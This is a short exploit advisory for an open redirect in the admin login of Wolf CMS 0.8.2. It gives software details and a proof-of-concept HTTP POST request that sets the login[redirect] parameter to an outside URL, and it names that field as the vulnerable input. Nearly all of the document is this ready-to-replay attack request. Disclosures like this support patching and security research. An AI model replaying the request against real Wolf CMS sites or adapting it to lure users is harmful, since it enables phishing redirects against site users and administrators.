[+] Exploit Title: Wolf CMS Open Redirect Vulnerability [+] Google Dork: N/A [+] Date: 10/8/2015 [+] Exploit Author: Arash Khazaei [+] Vendor Homepage: https://www.wolfcms.org/ [+] Software Link: https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip [+] Version: 0.8.2(Last Version) [+] Tested on: Kali / Mozilla FireFox, Windows / Google Chrome [+] CVE : N/A =============================== Introduction : WolfCMS Is A Content Management System Licensed Under GPL V3 And Coded In PHP. A Vulnerability In WolfCMS 0.8.2(Last Version) Allow Open Redirect In CMS Admin Page =============================== POC: POST /wolfcms/?/admin/login/login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wolfcms/?/admin/login Cookie: PHPSESSID=cromsl98l41rudqe4ubront5v3 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 99 login[username]=admin&login[password]=admin&login[redirect]= http://google.com/ # Vulnerable Input => login[redirect]=[Open Redirect] Discovered By : Arash Khazaei .